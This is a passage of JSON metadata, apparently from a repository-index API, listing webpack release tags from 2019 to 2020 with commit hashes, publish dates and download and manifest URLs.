0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webp